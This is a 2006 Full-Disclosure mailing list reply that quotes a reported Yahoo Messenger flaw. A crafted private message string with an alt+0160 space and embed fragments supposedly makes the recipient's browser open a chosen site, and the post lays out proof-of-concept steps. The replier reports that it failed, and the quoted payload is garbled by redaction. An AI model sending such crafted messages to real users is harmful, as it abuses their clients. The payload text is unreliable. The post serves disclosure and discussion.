I just tried this in Messenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160, and the most I could get it to do was a Yahoo Search on the string. Other side sees:
s: helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(.
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(.
There must be some other settings on either Messenger or the computer itself for this to work as you say. Possibly a setting for Messenger to use your default browser for searches instead of the PM window?
Cheers
On 7/28/06, Ivan Ivan <[EMAIL PROTECTED]> wrote:
Hi,
I found another vulnerability in Yahoo Messenger:
if you receive a private message with this string
"helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?("
(without quotes), Yahoo Messenger opens, in this case,
google.com in the Internet Explorer of the remote
victim.
Yahoo messenger bug proof of concept:
1. Open Messenger and log in.
2. Open a third-party Yahoo chat client like yahelite through
the Ymsgr protocol and log in with another account.
3. Send a PM to the Messenger account with this
string: s: helomsg
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
>:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
>:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
4. The remote user will open www.google.com (you can
change it)
Note: "helomsg :" this space must be created with
alt+0160 and this "s: " with a space
s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
Tested in yahoo messenger 7.0/7.5
Regards.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
There is intelligence is in having all the answers, but wisdom lies in knowing which of the questions to answer.
